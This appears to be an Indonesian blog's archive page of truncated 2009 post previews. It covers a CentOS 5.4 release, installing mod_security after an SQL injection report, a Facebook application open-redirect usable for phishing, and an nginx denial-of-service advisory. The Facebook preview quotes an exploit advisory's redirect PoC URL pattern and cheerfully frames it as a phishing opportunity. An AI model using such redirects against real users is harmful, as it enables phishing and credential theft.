Postingan

Menampilkan postingan dari Oktober 25, 2009

Centos 5.4

The CentOS team is pleased to announce the availability of CentOS 5.4. Major changes in CentOS 5 compared to CentOS 4 include: These updated software versions: Apache-2.2, php-5.1.6, kernel-2.6.18, Gnome-2.16, KDE-3.5, OpenOffice.org-2.3, Evolution-2.12, Firefox-3.0, Thunderbird-2.0, MySQL-5.0, PostgreSQL-8. Better desktop support with compiz and AIGLX. Virtualization provided by the Xen hypervisor with Virtual Machine Manager and libvirt. Major changes compared to earlier CentOS 5 versions include: KVM as a preview for the new virtualization technology in Enterprise Linux. ext4 as a technology preview in file systems. Source : www.centos.org download from local ix ( Indonesia ) http://mirror.unej.ac.id/centos/5.4/isos/i386/

Sql injection and mod security - black and white

this noon , we read mail from someone and he claim he find sql injection in our site , how it can be ... , magic quota still off and mod_security not yet installed see this article from : http://www.cyberciti.biz/faq/rhel-fedora-centos-httpd-mod_security-configuration/ Red Hat / CentOS Install mod_security Apache Intrusion Detection And Prevention Engine by Vivek Gite How do I install ModSecurity - an open source intrusion detection and prevention engine for web applications under CentOS / RHEL / Red Hat Enterprise Linux 5.x server? ModSecurity operates embedded into the web server (httpd), acting as a powerful umbrella - shielding web applications from attacks. In order to use mod_security, you need to turn on EPEL repo under CentOS / RHEL Linux. Once repo is turned on, type the following command to install ModSecurity: # yum install mod_security Sample output: Loaded plugins: downloadonly, fastestmirror, priorities, protectbase Loading mirror speeds from cached hostfile * epel: www.

Redirect and Phising Facebook

This night very smooth just open my eyes and read the security around the world, facebook is the biggest social community and there are people can make the application like games , quiz and etc. Can we Phising that ?... of course ... have u read this http://www.packetstormsecurity.com/0910-exploits/facebook-redir.txt _00000__00000__00000__00000__0___0__00000____0___0___000___0___0_ _0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_ _0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_ _____0______0______0__0______0___0__0________0___0__00000__0___0_ _0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_ _________________________________________________________________ # [+] Facebook Redirection # # [+] Author : 599eme Man # [+] Contact : Flouf@live.fr # #[------------------------------------------------------------------------------------] # # [+] How use ? # # http://apps.facebook.com/quizzname/?next=[Redirection] # # [+] PoC : # # http://apps.fa

check your nginx

http://www.packetstormsecurity.com/0910-exploits/nginx-dos.txt debian:~# uname -a Linux debian 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686 GNU/Linux debian:~# cat /etc/issue Debian GNU/Linux 4.0 \n \l debian:~# dpkg -l|grep nginx ii nginx 0.4.13-2+etch2 small, but very powerful and efficient debian:~# ps xauwww|grep worker|grep -v grep www-data 3577 0.0 0.9 2688 928 ? S 01:50 0:00 nginx: worker process debian:~# gdb -p 3577 GNU gdb 6.4.90-debian Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-linux-gnu". Attaching to process 3577 Reading symbols from /usr/sbin/nginx...(no debugging symbols found)...done. Using host libthread_db library "/l